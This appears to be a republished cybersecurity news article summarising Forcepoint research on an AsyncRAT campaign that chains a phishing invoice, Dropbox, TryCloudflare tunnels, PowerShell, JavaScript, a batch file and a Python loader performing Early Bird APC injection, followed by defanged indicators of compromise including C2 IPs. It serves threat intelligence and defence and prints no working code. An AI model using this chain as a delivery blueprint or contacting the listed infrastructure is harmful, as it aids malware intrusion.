AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts for Malware Delivery

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Spread the love

AsyncRAT is back in the headlines, and the attackers behind it have found a clever way to hide in plain sight.

Instead of relying on suspicious servers, they use Dropbox links and TryCloudflare tunnels, both trusted services that most security tools rarely block.

The result is a campaign that slips past everyday defenses while quietly handing control of infected computers to attackers.

The trojan itself is nothing new. AsyncRAT has been used for years to spy on victims, steal data, and run remote commands without being noticed.

What makes this wave notable is the delivery method, which leans on legitimate cloud infrastructure and a hidden Python package to install the final payload.

Researchers from Forcepoint recently identified this AsyncRAT campaign, noting that it closely resembles an earlier attack the company analyzed back in August.

The team said the reuse of TryCloudflare confirms predictions made in its 2025 Future Insights report, which warned that attackers would increasingly abuse legitimate infrastructure to stay under the radar.

The infection starts with something almost everyone has seen before, a phishing email carrying an invoice themed message.

Clicking the embedded Dropbox link triggers a chain of downloads that eventually installs AsyncRAT while showing the victim a convincing fake PDF invoice to keep suspicion low.

Forcepoint said in a report shared with Cyber Security News (CSN) that the campaign shows how easily trusted platforms can be turned into delivery tools for serious cyber threats.

AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts

The email lure hides a Dropbox URL behind a German language button labeled to download an invoice. Clicking it downloads a ZIP file containing an internet shortcut, and opening it connects to a TryCloudflare subdomain.

AsyncRAT attack chain (Source – Forcepoint)

That subdomain hosts an LNK file, which uses PowerShell to fetch a JavaScript file from the same tunnel.

.LNK file with path to JavaScript file (Source – Forcepoint)

The JavaScript, once deobfuscated, quietly pulls down a batch file from the same infrastructure.

Fake PDF file used for distraction (Source – Forcepoint)

This batch file is heavily obfuscated and does the real heavy lifting. It opens the fake invoice PDF as a decoy while downloading a second ZIP file that carries a Python package. It also checks whether Python is installed, running a bundled interpreter if not.

Actual malicious files (Source – Forcepoint)

Inside that Python package, most files are harmless setup components. Only a single script named load.py, along with five accompanying binary files, actually carries out the attack.

Python Loader And Final Payload

Once triggered, load.py calls on ctypes, a Python library that talks directly to Windows system functions. It uses this access to allocate memory, create threads, and copy shellcode into place, all classic building blocks of process injection,

The technique used here is Early Bird APC Queue injection. It plants code into a newly created process before that process starts running its main thread, making it harder for antivirus and endpoint tools to catch.

One binary injects VenomRAT into the legitimate notepad.exe process, another injects XWorm, and remaining files inject AsyncRAT shellcode into explorer.exe. All variants reach out to the same command and control servers over different ports.

Forcepoint noted its customers already have protection at several stages of this chain, including blocking the lure attachments, redirect URLs, dropper files, and call home traffic to the command and control servers.

Its NGFW products also terminate LNK file transfers and suspicious PowerShell connections by default.

Treat unexpected invoice emails with caution, especially ones urging an urgent download, and avoid opening ZIP attachments or shortcut files from unknown senders. Keeping PowerShell logging enabled can also help catch this infection early.

Forcepoint expects more campaigns like this going forward, since low cost, disposable infrastructure makes it cheap for criminals to launch infostealers and remote access trojans while staying ahead of blocklists.

Indicators of Compromise (IoCs):-

Type Indicator Description
URL hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/ Hosts the LNK file used in the attack chain 
URL hxxps[:]//mercy-synopsis-notify-motels[.]trycloudflare[.]com/ma[.]zip Delivers the malicious Python package ZIP 
URL hxxp[:]//sufficiently-points-est-minimize[.]trycloudflare[.]com/ma[.]zip Alternate host delivering the Python package ZIP 
C2 IP 62.60.190.141 Command and control server, contacted over ports 3232 and 4056 
C2 IP 62.60.190.196 Secondary command and control server 
File Hash (ZIP) 55724b766dd1fe8bf9dd4cb7094b83b88d57d945 Initial ZIP file downloaded from Dropbox 
File Hash (URL) 4483561a49791a7cd684258e9f1623fe7dfba772 Internet shortcut file embedded with TryCloudflare link 
File Hash (LNK) 0aa1b8fba8d7bd19a0064edfdf86c027da253644 LNK file that triggers PowerShell download 
File Hash (JS) 659ecdeb19b8e49be61fe41e8796d1215272b16e JavaScript file linking to BAT file 
File Hash (BAT) cd61de9e4003ba568ae76f064935addb106a6d6d Obfuscated batch file that downloads the Python package 
File Hash (ZIP) 0221ec304905a758d9b47d6a631622b7dcf3c1f5 ma.zip file containing malicious Python components 
File Hash (PY) 4747ee49bdf31351c025049d8c3b7fef831be77c load.py, the malicious Python loader script 
File Hash (BIN) 8ef36a4865f4a73a4e8fe4b90e5eff4a7feb3647 Shellcode binary loaded by load.py 
File Hash (BIN) ae1dece09c2b627d8d3fe1c1f758db9ca6d5820c Shellcode binary loaded by load.py 
File Hash (BIN) 8dc9071a46a019547c8355a155d9c3c3b154e7a2 Shellcode binary loaded by load.py 
File Hash (BIN) 098c369c904e8c328df40062190aff009e02d369 Shellcode binary loaded by load.py 
File Hash (BIN) ff6186eef1c17a2668c6013d38fecead4f507556 Shellcode binary loaded by load.py 

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

 Strengthen Your SOC by Accelerating Threat Detection & Rapid Investigations. -> Integrate ANY.RUN With Your SOC Now.